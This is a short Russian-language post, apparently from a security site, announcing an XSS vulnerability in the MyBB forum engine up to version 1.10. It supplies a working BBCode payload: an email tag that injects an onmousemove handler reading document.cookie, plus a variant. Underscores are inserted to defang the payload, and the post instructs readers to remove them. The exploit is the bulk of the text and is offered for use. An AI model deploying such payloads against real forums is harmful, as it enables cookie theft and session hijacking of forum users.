Очередная XSS в MyBB

Недавно была найдена очередная уязвимость в форумном движке MyBB <=1.10, кроме недавнего эксплойта. Уязвимость класса XSS.
[code][_email=a» onmousemove=»alert(document._cookie);» mail@_mail.ru]Заходи сюда[_/email][/code]
Возможна модификация:
onmousemove=»alert(document._cookie);»
При использовании «_» необходимо убрать.